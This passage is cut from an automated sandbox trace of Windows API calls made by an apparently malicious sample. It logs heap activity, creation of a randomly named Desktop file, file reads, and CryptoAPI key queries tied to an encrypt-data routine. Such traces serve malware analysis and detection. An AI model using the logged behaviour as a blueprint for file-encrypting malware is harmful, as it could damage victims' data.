hHeap=0x650000) returned 1 [0076.603] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0076.603] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0076.603] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6d34d8 | out: hHeap=0x650000) returned 1 [0076.603] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0076.603] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6d3530 | out: hHeap=0x650000) returned 1 [0076.603] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb428 | out: hHeap=0x650000) returned 1 [0076.603] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3a8 | out: hHeap=0x650000) returned 1 [0076.603] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0076.603] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7zcAt1JobB0Roi5s.flyingship.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7zcat1jobb0roi5s.flyingship.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0076.604] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e318 | out: hHeap=0x650000) returned 1 [0076.604] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a688 | out: hHeap=0x650000) returned 1 [0076.604] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e558 | out: hHeap=0x650000) returned 1 [0076.604] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dd38 | out: hHeap=0x650000) returned 1 [0076.604] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4c8 | out: hHeap=0x650000) returned 1 [0076.604] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.604] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6a1f38 | out: hHeap=0x650000) returned 1 [0076.604] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0076.604] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4c8 | out: hHeap=0x650000) returned 1 [0076.604] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.604] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8b78 | out: hHeap=0x650000) returned 1 [0076.604] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.604] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.604] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0076.604] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96e8 | out: hHeap=0x650000) returned 1 [0076.604] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0076.604] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0076.605] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61ea48 | out: lpNewFilePointer=0x0) returned 1 [0076.605] ReadFile (in: hFile=0x140, lpBuffer=0x771fe8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x61ea70, lpOverlapped=0x0 | out: lpBuffer=0x771fe8*, lpNumberOfBytesRead=0x61ea70*=0xeb7c, lpOverlapped=0x0) returned 1 [0076.607] ReadFile (in: hFile=0x140, lpBuffer=0x771fe8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x61ea70, lpOverlapped=0x0 | out: lpBuffer=0x771fe8*, lpNumberOfBytesRead=0x61ea70*=0x0, lpOverlapped=0x0) returned 1 [0076.607] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afd0 | out: hHeap=0x650000) returned 1 [0076.607] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0076.607] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e318 | out: hHeap=0x650000) returned 1 [0076.609] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x32b0020 | out: hHeap=0x650000) returned 1 [0076.610] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e558 | out: hHeap=0x650000) returned 1 [0076.610] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a688 | out: hHeap=0x650000) returned 1 [0076.610] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dd38 | out: hHeap=0x650000) returned 1 [0076.610] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4c8 | out: hHeap=0x650000) returned 1 [0076.610] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x795ff8 | out: hHeap=0x650000) returned 1 [0076.610] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0076.610] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.611] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0076.611] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x795ff8 | out: hHeap=0x650000) returned 1 [0076.611] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb498 | out: hHeap=0x650000) returned 1 [0076.611] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a688 | out: hHeap=0x650000) returned 1 [0076.611] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dd38 | out: hHeap=0x650000) returned 1 [0076.611] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0076.611] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.611] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96e8 | out: hHeap=0x650000) returned 1 [0076.611] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb498 | out: hHeap=0x650000) returned 1 [0076.611] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0076.611] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.611] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0076.611] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692e90 | out: hHeap=0x650000) returned 1 [0076.611] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb498 | out: hHeap=0x650000) returned 1 [0076.611] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0076.611] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb558 | out: hHeap=0x650000) returned 1 [0076.611] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3b8 | out: hHeap=0x650000) returned 1 [0076.611] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x650000) returned 1 [0076.612] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad18 | out: hHeap=0x650000) returned 1 [0076.612] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.612] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb438 | out: hHeap=0x650000) returned 1 [0076.612] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb438 | out: hHeap=0x650000) returned 1 [0076.612] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.612] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab98 | out: hHeap=0x650000) returned 1 [0076.612] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df88 | out: hHeap=0x650000) returned 1 [0076.612] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0076.612] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b5d0 | out: hHeap=0x650000) returned 1 [0076.612] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb598 | out: hHeap=0x650000) returned 1 [0076.612] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb388 | out: hHeap=0x650000) returned 1 [0076.612] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5b8 | out: hHeap=0x650000) returned 1 [0076.612] PeekMessageW (in: lpMsg=0x61e3dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3dc) returned 0 [0076.612] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac10 | out: hHeap=0x650000) returned 1 [0076.612] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb508 | out: hHeap=0x650000) returned 1 [0076.612] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0076.612] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e138 | out: hHeap=0x650000) returned 1 [0076.612] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb518 | out: hHeap=0x650000) returned 1 [0076.612] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e240 | out: hHeap=0x650000) returned 1 [0076.612] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb398 | out: hHeap=0x650000) returned 1 [0076.612] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afe8 | out: hHeap=0x650000) returned 1 [0076.612] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb648 | out: hHeap=0x650000) returned 1 [0076.612] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68da18 | out: hHeap=0x650000) returned 1 [0076.612] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb508 | out: hHeap=0x650000) returned 1 [0076.612] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e390 | out: hHeap=0x650000) returned 1 [0076.613] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac10 | out: hHeap=0x650000) returned 1 [0076.613] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68da90 | out: hHeap=0x650000) returned 1 [0076.613] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0076.613] PeekMessageW (in: lpMsg=0x61e3dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3dc) returned 0 [0076.613] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0076.613] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0076.613] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0076.613] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afe8 | out: hHeap=0x650000) returned 1 [0076.613] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb518 | out: hHeap=0x650000) returned 1 [0076.613] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e390 | out: hHeap=0x650000) returned 1 [0076.613] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb508 | out: hHeap=0x650000) returned 1 [0076.613] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76f0b0 | out: hHeap=0x650000) returned 1 [0076.613] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9748 | out: hHeap=0x650000) returned 1 [0076.613] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac10 | out: hHeap=0x650000) returned 1 [0076.613] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e240 | out: hHeap=0x650000) returned 1 [0076.613] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e138 | out: hHeap=0x650000) returned 1 [0076.613] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68da90 | out: hHeap=0x650000) returned 1 [0076.613] PeekMessageW (in: lpMsg=0x61e3dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3dc) returned 0 [0076.613] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac10 | out: hHeap=0x650000) returned 1 [0076.613] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.613] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692e90 | out: hHeap=0x650000) returned 1 [0076.613] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4d8 | out: hHeap=0x650000) returned 1 [0076.613] PeekMessageW (in: lpMsg=0x61dd8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61dd8c) returned 0 [0076.613] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb578 | out: hHeap=0x650000) returned 1 [0076.613] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4d8 | out: hHeap=0x650000) returned 1 [0076.613] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b780 | out: hHeap=0x650000) returned 1 [0076.613] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e390 | out: hHeap=0x650000) returned 1 [0076.613] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0076.613] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0076.613] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0076.613] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0076.613] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0076.614] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0076.614] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0076.614] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0076.614] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68da18 | out: hHeap=0x650000) returned 1 [0076.614] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4d8 | out: hHeap=0x650000) returned 1 [0076.614] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4d8 | out: hHeap=0x650000) returned 1 [0076.614] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e648 | out: hHeap=0x650000) returned 1 [0076.614] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0076.614] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e570 | out: hHeap=0x650000) returned 1 [0076.614] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb578 | out: hHeap=0x650000) returned 1 [0076.614] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76f0b0 | out: hHeap=0x650000) returned 1 [0076.614] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9748 | out: hHeap=0x650000) returned 1 [0076.614] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af70 | out: hHeap=0x650000) returned 1 [0076.614] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aa30 | out: hHeap=0x650000) returned 1 [0076.614] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68da18 | out: hHeap=0x650000) returned 1 [0076.614] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0076.614] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0076.614] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb578 | out: hHeap=0x650000) returned 1 [0076.614] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb578 | out: hHeap=0x650000) returned 1 [0076.614] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e018 | out: hHeap=0x650000) returned 1 [0076.614] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4d8 | out: hHeap=0x650000) returned 1 [0076.614] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e678 | out: hHeap=0x650000) returned 1 [0076.614] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0076.614] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76f0b0 | out: hHeap=0x650000) returned 1 [0076.614] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9748 | out: hHeap=0x650000) returned 1 [0076.614] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e648 | out: hHeap=0x650000) returned 1 [0076.614] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e078 | out: hHeap=0x650000) returned 1 [0076.614] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68da18 | out: hHeap=0x650000) returned 1 [0076.614] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0076.614] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0076.614] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0076.614] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.615] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0c0 | out: hHeap=0x650000) returned 1 [0076.615] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0076.615] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b090 | out: hHeap=0x650000) returned 1 [0076.615] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4d8 | out: hHeap=0x650000) returned 1 [0076.615] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b090 | out: hHeap=0x650000) returned 1 [0076.615] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0076.615] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0c0 | out: hHeap=0x650000) returned 1 [0076.615] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb578 | out: hHeap=0x650000) returned 1 [0076.615] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0c0 | out: hHeap=0x650000) returned 1 [0076.615] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0076.615] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b090 | out: hHeap=0x650000) returned 1 [0076.615] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5d8 | out: hHeap=0x650000) returned 1 [0076.615] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b090 | out: hHeap=0x650000) returned 1 [0076.615] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0076.615] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0c0 | out: hHeap=0x650000) returned 1 [0076.615] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0076.615] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0c0 | out: hHeap=0x650000) returned 1 [0076.615] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0076.615] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b090 | out: hHeap=0x650000) returned 1 [0076.615] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0076.615] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b090 | out: hHeap=0x650000) returned 1 [0076.615] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0076.615] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0c0 | out: hHeap=0x650000) returned 1 [0076.615] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5c8 | out: hHeap=0x650000) returned 1 [0076.615] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0076.615] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x11) returned 0x6f9748 [0076.615] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x6f9748, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0076.615] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0c0 | out: hHeap=0x650000) returned 1 [0076.615] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dab8 [0076.615] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9748 | out: hHeap=0x650000) returned 1 [0076.616] GetProcAddress (hModule=0x77710000, lpProcName="CryptGetKeyParam") returned 0x777377cb [0076.616] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dab8 | out: hHeap=0x650000) returned 1 [0076.616] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5c8 | out: hHeap=0x650000) returned 1 [0076.616] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dab8 [0076.616] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5c8 [0076.616] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3e8 [0076.616] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb538 [0076.616] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb448 [0076.616] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb588 [0076.616] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5c8 | out: hHeap=0x650000) returned 1 [0076.616] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0076.616] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb538 | out: hHeap=0x650000) returned 1 [0076.616] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb448 | out: hHeap=0x650000) returned 1 [0076.616] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb588 | out: hHeap=0x650000) returned 1 [0076.616] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dab8 | out: hHeap=0x650000) returned 1 [0076.616] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb398, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb398*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0076.616] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb588 [0076.616] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x792238 [0076.616] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f9748 [0076.616] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0c0 [0076.616] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b090 [0076.616] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df58 [0076.616] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb448 [0076.616] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df58 | out: hHeap=0x650000) returned 1 [0076.616] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb448 | out: hHeap=0x650000) returned 1 [0076.616] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b090 | out: hHeap=0x650000) returned 1 [0076.616] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b090 [0076.616] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df58 [0076.617] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e150 [0076.617] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb448 [0076.617] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e150 | out: hHeap=0x650000) returned 1 [0076.617] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb448 | out: hHeap=0x650000) returned 1 [0076.617] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df58 | out: hHeap=0x650000) returned 1 [0076.617] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df58 [0076.617] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e150 [0076.617] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e360 [0076.617] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb448 [0076.617] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e360 | out: hHeap=0x650000) returned 1 [0076.617] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb448 | out: hHeap=0x650000) returned 1 [0076.617] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e150 | out: hHeap=0x650000) returned 1 [0076.617] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e150 [0076.617] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e360 [0076.617] RtlAllocateHeap 